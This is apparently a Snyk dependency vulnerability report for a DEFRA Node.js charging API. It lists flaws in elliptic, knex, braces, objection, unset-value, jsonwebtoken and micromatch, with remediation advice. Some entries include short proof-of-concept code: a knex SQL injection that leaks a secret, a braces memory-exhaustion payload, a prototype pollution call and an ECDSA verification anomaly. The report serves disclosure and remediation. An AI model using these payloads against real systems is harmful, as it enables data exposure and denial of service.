Vulnerabilities |
9 via 13 paths |
|---|---|
Dependencies |
446 |
Source |
GitHub |
Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: elliptic
- Introduced through: jwk-to-pem@2.0.7
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › jwk-to-pem@2.0.7 › elliptic@6.6.1
Overview
elliptic is a fast elliptic-curve cryptography implementation in plain javascript.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to an anomaly in the _truncateToN function. An attacker can cause legitimate transactions or communications to be incorrectly flagged as invalid by exploiting the signature verification process when the hash contains at least four leading 0 bytes, and the order of the elliptic curve's base point is smaller than the hash.
In some situations, a private key exposure is possible. This can happen when an attacker knows a faulty and the corresponding correct signature for the same message.
Note: Although the vector for exploitation of this vulnerability was restricted with the release of versions 6.6.0 and 6.6.1, it remains possible to generate invalid signatures in some cases in those releases as well.
PoC
var elliptic = require('elliptic'); // tested with version 6.5.7
var hash = require('hash.js');
var BN = require('bn.js');
var toArray = elliptic.utils.toArray;
var ec = new elliptic.ec('p192');
var msg = '343236343739373234';
var sig = '303502186f20676c0d04fc40ea55d5702f798355787363a91e97a7e50219009d1c8c171b2b02e7d791c204c17cea4cf556a2034288885b';
// Same public key just in different formats
var pk = '04cd35a0b18eeb8fcd87ff019780012828745f046e785deba28150de1be6cb4376523006beff30ff09b4049125ced29723';
var pkPem = '-----BEGIN PUBLIC KEY-----\nMEkwEwYHKoZIzj0CAQYIKoZIzj0DAQEDMgAEzTWgsY7rj82H/wGXgAEoKHRfBG54\nXeuigVDeG+bLQ3ZSMAa+/zD/CbQEkSXO0pcj\n-----END PUBLIC KEY-----\n';
// Create hash
var hashArray = hash.sha256().update(toArray(msg, 'hex')).digest();
// Convert array to string (just for showcase of the leading zeros)
var hashStr = Array.from(hashArray, function(byte) {
return ('0' + (byte & 0xFF).toString(16)).slice(-2);
}).join('');
var hMsg = new BN(hashArray, 'hex');
// Hashed message contains 4 leading zeros bytes
console.log('sha256 hash(str): ' + hashStr);
// Due to using BN bitLength lib it does not calculate the bit length correctly (should be 32 since it is a sha256 hash)
console.log('Byte len of sha256 hash: ' + hMsg.byteLength());
console.log('sha256 hash(BN): ' + hMsg.toString(16));
// Due to the shift of the message to be within the order of the curve the delta computation is invalid
var pubKey = ec.keyFromPublic(toArray(pk, 'hex'));
console.log('Valid signature: ' + pubKey.verify(hashStr, sig));
// You can check that this hash should validate by consolidating openssl
const fs = require('fs');
fs.writeFile('msg.bin', new BN(msg, 16).toBuffer(), (err) => {
if (err) throw err;
});
fs.writeFile('sig.bin', new BN(sig, 16).toBuffer(), (err) => {
if (err) throw err;
});
fs.writeFile('cert.pem', pkPem, (err) => {
if (err) throw err;
});
// To verify the correctness of the message signature and key one can run:
// openssl dgst -sha256 -verify cert.pem -signature sig.bin msg.bin
// Or run this python script
/*
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
msg = '343236343739373234'
sig = '303502186f20676c0d04fc40ea55d5702f798355787363a91e97a7e50219009d1c8c171b2b02e7d791c204c17cea4cf556a2034288885b'
pk = '04cd35a0b18eeb8fcd87ff019780012828745f046e785deba28150de1be6cb4376523006beff30ff09b4049125ced29723'
p192 = ec.SECP192R1()
pk = ec.EllipticCurvePublicKey.from_encoded_point(p192, bytes.fromhex(pk))
pk.verify(bytes.fromhex(sig), bytes.fromhex(msg), ec.ECDSA(hashes.SHA256()))
*/
Remediation
There is no fixed version for elliptic.
References
high severity
- Vulnerable module: knex
- Introduced through: knex@0.21.21
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21Remediation: Upgrade to knex@2.4.0.
Overview
knex is a query builder for PostgreSQL, MySQL and SQLite3
Affected versions of this package are vulnerable to SQL Injection due to missing escape of field objects, which allows ignoring the WHERE clause of a SQL query.
Note:
Exploiting this vulnerability is possible when using MySQL DB.
PoC
const knex = require('knex')({
client: 'mysql2',
connection: {
host: '127.0.0.1',
user: 'root',
password: 'supersecurepassword',
database: 'poc',
charset: 'utf8'
}
})
knex.schema.hasTable('users').then((exists) => {
if (!exists) {
knex.schema.createTable('users', (table) => {
table.increments('id').primary()
table.string('name').notNullable()
table.string('secret').notNullable()
}).then()
knex('users').insert({
name: "admin",
secret: "you should not be able to return this!"
}).then()
knex('users').insert({
name: "guest",
secret: "hello world"
}).then()
}
})
attackerControlled = {
"name": "admin"
}
knex('users')
.select()
.where({secret: attackerControlled})
.then((userSecret) => console.log(userSecret))
Remediation
Upgrade knex to version 2.4.0 or higher.
References
high severity
- Vulnerable module: braces
- Introduced through: knex@0.21.21
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › braces@2.3.2Remediation: Upgrade to knex@0.95.0.
Overview
braces is a Bash-like brace expansion, implemented in JavaScript.
Affected versions of this package are vulnerable to Excessive Platform Resource Consumption within a Loop due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.
PoC
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Remediation
Upgrade braces to version 3.0.3 or higher.
References
high severity
- Vulnerable module: objection
- Introduced through: objection@2.2.18
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › objection@2.2.18Remediation: Upgrade to objection@3.0.0.
Overview
objection is an An SQL-friendly ORM for Node.js
Affected versions of this package are vulnerable to Prototype Pollution via set and zipObject functions in lib/utils/objectUtils.js.
PoC
var objectUtils = require("objection/lib/utils/objectUtils")
console.log("Before: " + {}.polluted)
let obj = {}
objectUtils.set(obj, ['__proto__', 'polluted'], 'Pollution successful!')
console.log("After: " + {}.polluted)
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade objection to version 3.0.0-alpha.5 or higher.
References
high severity
- Vulnerable module: unset-value
- Introduced through: knex@0.21.21
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the unset function in index.js, because it allows access to object prototype properties.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade unset-value to version 2.0.1 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: @now-ims/hapi-now-auth@2.1.0
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › @now-ims/hapi-now-auth@2.1.0 › jsonwebtoken@8.5.1
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm such that the library can be misconfigured to use legacy, insecure key types for signature verification. For example, DSA keys could be used with the RS256 algorithm.
Exploitability
Users are affected when using an algorithm and a key type other than the combinations mentioned below:
EC: ES256, ES384, ES512
RSA: RS256, RS384, RS512, PS256, PS384, PS512
RSA-PSS: PS256, PS384, PS512
And for Elliptic Curve algorithms:
ES256: prime256v1
ES384: secp384r1
ES512: secp521r1
Workaround
Users who are unable to upgrade to the fixed version can use the allowInvalidAsymmetricKeyTypes option to true in the sign() and verify() functions to continue usage of invalid key type/algorithm combination in 9.0.0 for legacy compatibility.
Remediation
Upgrade jsonwebtoken to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: @now-ims/hapi-now-auth@2.1.0
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › @now-ims/hapi-now-auth@2.1.0 › jsonwebtoken@8.5.1
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Improper Restriction of Security Token Assignment via the secretOrPublicKey argument due to misconfigurations of the key retrieval function jwt.verify(). Exploiting this vulnerability might result in incorrect verification of forged tokens when tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm.
Note:
This vulnerability affects your application if it supports the usage of both symmetric and asymmetric keys in jwt.verify() implementation with the same key retrieval function.
Remediation
Upgrade jsonwebtoken to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: @now-ims/hapi-now-auth@2.1.0
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › @now-ims/hapi-now-auth@2.1.0 › jsonwebtoken@8.5.1
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Improper Authentication such that the lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification.
Exploitability
Users are affected only if all of the following conditions are true for the jwt.verify() function:
A token with no signature is received.
No algorithms are specified.
A falsy (e.g.,
null,false,undefined) secret or key is passed.
Remediation
Upgrade jsonwebtoken to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: micromatch
- Introduced through: knex@0.21.21
Detailed paths
-
Introduced through: sroc-charging-module-api@DEFRA/sroc-charging-module-api › knex@0.21.21 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10Remediation: Upgrade to knex@0.95.0.
Overview
Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.
Remediation
Upgrade micromatch to version 4.0.8 or higher.